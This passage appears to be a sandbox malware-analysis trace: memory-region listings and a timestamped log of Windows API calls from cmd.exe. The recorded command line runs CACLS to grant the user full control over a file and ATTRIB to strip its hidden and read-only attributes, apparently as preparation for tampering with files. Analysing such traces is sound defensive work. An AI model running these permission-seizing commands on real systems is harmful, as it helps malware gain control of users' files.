"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18198 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18199 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18200 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18201 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18202 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18203 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18204 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 18205 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18206 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18207 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 18208 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 18209 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 18210 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 18211 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 18212 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 18213 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 18214 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 267 os_tid = 0xbdc [0147.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30ff64 | out: lpSystemTimeAsFileTime=0x30ff64*(dwLowDateTime=0x91a540a0, dwHighDateTime=0x1d440a9)) [0147.155] GetCurrentProcessId () returned 0xb10 [0147.155] GetCurrentThreadId () returned 0xbdc [0147.155] GetTickCount () returned 0x2dbbe [0147.155] QueryPerformanceCounter (in: lpPerformanceCount=0x30ff5c | out: lpPerformanceCount=0x30ff5c*=20394426980) returned 1 [0147.156] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0147.156] __set_app_type (_Type=0x1) [0147.156] __p__fmode () returned 0x76b331f4 [0147.156] __p__commode () returned 0x76b331fc [0147.156] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0147.156] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0147.156] GetCurrentThreadId () returned 0xbdc [0147.156] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbdc) returned 0x38 [0147.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.156] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0147.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.157] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.157] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fef4 | out: phkResult=0x30fef4*=0x0) returned 0x2 [0147.157] VirtualQuery (in: lpAddress=0x30ff2b, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.157] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.157] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.157] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.157] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0147.157] GetConsoleOutputCP () returned 0x1b5 [0147.157] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.157] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0147.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0147.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.158] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.158] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.158] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0147.158] GetEnvironmentStringsW () returned 0xc0380* [0147.159] FreeEnvironmentStringsW (penv=0xc0380) returned 1 [0147.159] GetEnvironmentStringsW () returned 0xc0380* [0147.159] FreeEnvironmentStringsW (penv=0xc0380) returned 1 [0147.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee64 | out: phkResult=0x30ee64*=0x40) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x30, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x1, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x1, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x0, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x40, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x40, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x40, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegCloseKey (hKey=0x40) returned 0x0 [0147.159] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee64 | out: phkResult=0x30ee64*=0x40) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x40, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x1, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x1, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x0, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.160] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x9, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.160] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x4, lpData=0x30ee70*=0x9, lpcbData=0x30ee68*=0x4) returned 0x0 [0147.160] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee6c, lpData=0x30ee70, lpcbData=0x30ee68*=0x1000 | out: lpType=0x30ee6c*=0x0, lpData=0x30ee70*=0x9, lpcbData=0x30ee68*=0x1000) returned 0x2 [0147.160] RegCloseKey (hKey=0x40) returned 0x0 [0147.160] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886375 [0147.160] srand (_Seed=0x5b886375) [0147.160] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"" [0147.160] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"" [0147.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.160] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc1ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0147.160] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.161] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.161] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.161] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.161] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.161] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.161] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.161] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.161] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.161] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.161] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.161] GetEnvironmentStringsW () returned 0xc24d0* [0147.161] FreeEnvironmentStringsW (penv=0xc24d0) returned 1 [0147.161] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.161] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.161] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.161] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.161] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.161] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.161] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.161] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.161] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.161] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.162] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fc30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30fc30, lpFilePart=0x30fc2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30fc2c*="Desktop") returned 0x18 [0147.162] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.162] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f9ac | out: lpFindFileData=0x30f9ac) returned 0xc0b60 [0147.162] FindClose (in: hFindFile=0xc0b60 | out: hFindFile=0xc0b60) returned 1 [0147.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f9ac | out: lpFindFileData=0x30f9ac) returned 0xc0b60 [0147.162] FindClose (in: hFindFile=0xc0b60 | out: hFindFile=0xc0b60) returned 1 [0147.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f9ac | out: lpFindFileData=0x30f9ac) returned 0xc0b60 [0147.162] FindClose (in: hFindFile=0xc0b60 | out: hFindFile=0xc0b60) returned 1 [0147.163] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.163] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0147.163] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0147.163] GetEnvironmentStringsW () returned 0xc0380* [0147.163] FreeEnvironmentStringsW (penv=0xc0380) returned 1 [0147.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.164] GetConsoleOutputCP () returned 0x1b5 [0147.164] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.164] GetUserDefaultLCID () returned 0x409 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fd70, cchData=128 | out: lpLCData="0") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fd70, cchData=128 | out: lpLCData="0") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fd70, cchData=128 | out: lpLCData="1") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0147.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0147.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0147.165] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0147.166] GetConsoleTitleW (in: lpConsoleTitle=0xb0a08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.166] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0147.166] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0147.166] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0147.167] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0147.167] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0147.167] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0147.167] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0147.167] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0147.167] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0147.167] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0147.167] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0147.171] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0147.171] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0147.171] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0147.171] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0147.171] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0147.171] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0147.171] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0147.174] SetErrorMode (uMode=0x0) returned 0x0 [0147.174] SetErrorMode (uMode=0x1) returned 0x0 [0147.175] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc2028, lpFilePart=0x30f524 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f524*="Desktop") returned 0x18 [0147.175] SetErrorMode (uMode=0x0) returned 0x1 [0147.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.175] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.180] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.181] GetLastError () returned 0x2 [0147.181] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.181] GetLastError () returned 0x2 [0147.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xb0f68 [0147.181] FindClose (in: hFindFile=0xb0f68 | out: hFindFile=0xb0f68) returned 1 [0147.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xffffffff [0147.181] GetLastError () returned 0x2 [0147.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2a0) returned 0xb0f68 [0147.181] FindClose (in: hFindFile=0xb0f68 | out: hFindFile=0xb0f68) returned 1 [0147.181] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.181] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.181] GetConsoleTitleW (in: lpConsoleTitle=0x30f798, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.182] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f620, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f6e8 | out: lpAttributeList=0x30f620, lpSize=0x30f6e8) returned 1 [0147.182] UpdateProcThreadAttribute (in: lpAttributeList=0x30f620, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f6e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f620, lpPreviousValue=0x0) returned 1 [0147.182] GetStartupInfoW (in: lpStartupInfo=0x30f5dc | out: lpStartupInfo=0x30f5dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.182] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.183] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f67c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f6c8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30f6c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc08, dwThreadId=0xbf8)) returned 1 [0147.185] CloseHandle (hObject=0x4c) returned 1 [0147.185] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.185] GetEnvironmentStringsW () returned 0xc04f0* [0147.185] FreeEnvironmentStringsW (penv=0xc04f0) returned 1 [0147.185] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0147.222] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f5bc | out: lpExitCode=0x30f5bc*=0x0) returned 1 [0147.222] CloseHandle (hObject=0x50) returned 1 [0147.222] _vsnwprintf (in: _Buffer=0x30f704, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f5c8 | out: _Buffer="00000000") returned 8 [0147.223] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.223] GetEnvironmentStringsW () returned 0xc2320* [0147.223] FreeEnvironmentStringsW (penv=0xc2320) returned 1 [0147.223] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.223] GetEnvironmentStringsW () returned 0xc2320* [0147.223] FreeEnvironmentStringsW (penv=0xc2320) returned 1 [0147.223] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f620 | out: lpAttributeList=0x30f620) [0147.223] GetConsoleTitleW (in: lpConsoleTitle=0x30fa04, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 